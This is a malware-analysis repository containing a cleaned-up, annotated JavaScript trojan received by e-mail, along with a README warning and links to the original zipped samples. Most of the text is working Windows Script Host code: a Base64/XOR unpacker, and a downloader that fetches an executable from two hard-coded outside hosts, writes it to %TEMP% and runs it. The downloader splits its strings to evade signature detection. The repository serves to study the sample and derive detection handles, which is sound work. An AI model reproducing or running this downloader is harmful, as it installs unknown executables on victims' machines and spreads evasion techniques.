├── README.md
├── invoice_Ir1vkp.js
└── orig
    ├── WU4638533711.zip
    ├── WU6533175781.zip
    └── file.zip

/README.md:
--------------------------------------------------------------------------------
These files may harm your computer. Don't run them unless you know what you are doing.

This repo contains a encoded Javascript trojan I once received per e-mail. The script tries to download and run an EXE. I cleaned it up a little to show what it does.

See http://www.sjoerdlangkemper.nl/2016/02/18/polymorphic-javascript-malware/ for the explanation.

--------------------------------------------------------------------------------
/invoice_Ir1vkp.js:
--------------------------------------------------------------------------------
// Analyst notes on the cleaned-up sample (see README for provenance).
//
// The file has two parts:
//   1. `decode` — reverses the sample's two-layer text encoding
//      (Base64, then a repeating-key XOR with a hard-coded 16-byte key).
//      Nothing in this listing calls it; presumably the original wrapped
//      the IIFE below in decode()+eval — confirm against the files in orig/.
//   2. An IIFE that, under Windows Script Host, fetches a binary from one of
//      two hard-coded URLs, writes it to %TEMP% and executes it.
//
// The host API calls (WScript.CreateObject, MSXML2.XMLHTTP, ADODB.Stream,
// WScript.Shell.Exec) are the most useful detection handles: a script host
// process making an outbound GET and then spawning a freshly written .exe
// from the user's TEMP directory.

/**
 * Reverse the sample's packing: Base64-decode `packedText`, UTF-8-decode the
 * result, then XOR each character with `cipher` (key repeats every
 * cipher.length characters).
 *
 * @param {string} packedText - Base64 text; characters outside the Base64
 *   alphabet are stripped before decoding.
 * @returns {string} the unpacked text.
 */
var decode = function (packedText) {
    // Fixed XOR key for this sample (varies per sample; see README link).
    var cipher ="FRICVuNtlR4PYdTM";

    // Hand-rolled Base64 decoder (the widely copied `_keyStr` variant),
    // presumably used so the script needs no host-provided Base64 API.
    var Base64 = {
        _keyStr: "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/=",

        // Decode 4 Base64 symbols at a time into up to 3 bytes. Index 64 is
        // the '=' pad, which suppresses the 2nd/3rd output byte.
        decode: function (input) {
            var output = "";
            var chr1, chr2, chr3;
            var enc1, enc2, enc3, enc4;
            var i = 0;

            // Drop anything that is not in the Base64 alphabet (whitespace,
            // line breaks, junk inserted by the obfuscator).
            input = input.replace(/[^A-Za-z0-9\+\/\=]/g, "");

            while (i < input.length) {

                enc1 = this._keyStr.indexOf(input.charAt(i++));
                enc2 = this._keyStr.indexOf(input.charAt(i++));
                enc3 = this._keyStr.indexOf(input.charAt(i++));
                enc4 = this._keyStr.indexOf(input.charAt(i++));

                chr1 = (enc1 << 2) | (enc2 >> 4);
                chr2 = ((enc2 & 15) << 4) | (enc3 >> 2);
                chr3 = ((enc3 & 3) << 6) | enc4;

                output = output + String.fromCharCode(chr1);

                // 64 == '=' padding: no further bytes in this group.
                if (enc3 != 64) {
                    output = output + String.fromCharCode(chr2);
                }
                if (enc4 != 64) {
                    output = output + String.fromCharCode(chr3);
                }

            }

            // `output` holds raw bytes as chars; reinterpret them as UTF-8.
            output = Base64._utf8_decode(output);

            return output;

        },
        // Byte-string -> JS string, handling 1-, 2- and 3-byte UTF-8
        // sequences only (no 4-byte sequences; the final `else` assumes
        // 3 bytes). Note `c1`, `c2` and `c3` are never declared with `var`
        // and so leak as implicit globals — typical of copy-pasted code.
        _utf8_decode: function (utftext) {
            var string = "";
            var i = 0;
            var c = c1 = c2 = 0;

            while (i < utftext.length) {

                c = utftext.charCodeAt(i);

                if (c < 128) {
                    // ASCII: one byte.
                    string += String.fromCharCode(c);
                    i++;
                }
                else if ((c > 191) && (c < 224)) {
                    // 110xxxxx: two-byte sequence.
                    c2 = utftext.charCodeAt(i + 1);
                    string += String.fromCharCode(((c & 31) << 6) | (c2 & 63));
                    i += 2;
                }
                else {
                    // Everything else treated as a three-byte sequence.
                    c2 = utftext.charCodeAt(i + 1);
                    c3 = utftext.charCodeAt(i + 2);
                    string += String.fromCharCode(((c & 15) << 12) | ((c2 & 63) << 6) | (c3 & 63));
                    i += 3;
                }

            }
            return string;
        }
    };

    var text = Base64.decode(packedText);

    // Second layer: repeating-key XOR. The key wraps via `i % cipherLength`,
    // so the same 16 key bytes are reused for the whole text.
    var cipherLength = cipher.length;
    var result = "";
    for (var i = 0; i < text.length; i++) {
        result += String.fromCharCode(text.charCodeAt(i) ^ cipher.charCodeAt(i % cipherLength));
    }
    return result;
};

// Downloader stage. String constants are split up (e.g. "ADODB" + "." +
// "Stream") so that the full COM ProgIDs never appear as one literal in the
// source — a simple string-signature evasion; at runtime the ProgIDs are
// fully assembled and still observable to script-host instrumentation.
(function() {
    var statusOk = 200;
    var get = "GET";
    var exec = "Exec";
    var wscriptShell = "WScript.Shell";
    var xmlHttp = "MSXML2.XMLHTTP";
    var adodb = "ADODB";
    var stream = "Stream";
    var temp = "%TEMP%\\";
    var exe = ".exe";
    // Responses of 200 000 bytes or less are discarded — presumably to
    // reject error pages or sinkholed responses rather than a real binary.
    var minSize = 2e5;
    // Two fallback download locations; the loop stops at the first that
    // yields a large enough body.
    var urls = [ "http://helloworldqqq.com/26.exe", "http://wtfisgoinghereff.com/26.exe" ];
    // 524288 == 2^19, i.e. the same value as Math.pow(2, 19) used at the
    // Exec call below, so the file written and the file executed are both
    // %TEMP%\524288.exe.
    var filename = 524288;
    var shellObject = WScript.CreateObject(wscriptShell);
    var httpObject = WScript.CreateObject(xmlHttp);
    var streamObject = WScript.CreateObject(adodb + "." + stream);
    var tempDir = shellObject.ExpandEnvironmentStrings(temp);
    var exePath = tempDir + filename + exe;
    var success = false;
    for (var i = 0; i < urls.length; i++) {
        try {
            var url = urls[i];
            // Synchronous GET (third argument false): the script blocks
            // until the response arrives.
            httpObject.open(get, url, false);
            httpObject.send();
            if (httpObject.status == statusOk) {
                try {
                    streamObject.open();
                    // 1 == adTypeBinary: buffer the raw response body.
                    streamObject.type = 1;
                    streamObject.write(httpObject.responseBody);
                    if (streamObject.size > minSize) {
                        // Setting i past the end terminates the URL loop.
                        i = urls.length;
                        streamObject.position = 0;
                        // 2 == adSaveCreateOverWrite: write the body to
                        // %TEMP%, replacing any existing file.
                        streamObject.saveToFile(exePath, 2);
                        success = true;
                    }
                } finally {
                    streamObject.close();
                }
            }
        // Every failure (DNS error, timeout, COM error) is swallowed so the
        // loop simply moves on to the next URL.
        } catch (ignored) {}
    }
    if (success) {
        // shellObject["Exec"](...) — bracket access hides the method name
        // from a literal "Shell.Exec" search. Note the path is built without
        // the ".exe" suffix here; WScript.Shell.Exec resolves it via the
        // host's normal executable lookup — TODO confirm against the blog post.
        shellObject[exec](tempDir + Math.pow(2, 19));
    }
})();
--------------------------------------------------------------------------------
/orig/WU4638533711.zip:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Sjord/encoded-js-trojan/f0b933601bb09f4b435a9c449d6e9eea1eac0c60/orig/WU4638533711.zip
--------------------------------------------------------------------------------
/orig/WU6533175781.zip:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Sjord/encoded-js-trojan/f0b933601bb09f4b435a9c449d6e9eea1eac0c60/orig/WU6533175781.zip
--------------------------------------------------------------------------------
/orig/file.zip:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Sjord/encoded-js-trojan/f0b933601bb09f4b435a9c449d6e9eea1eac0c60/orig/file.zip
--------------------------------------------------------------------------------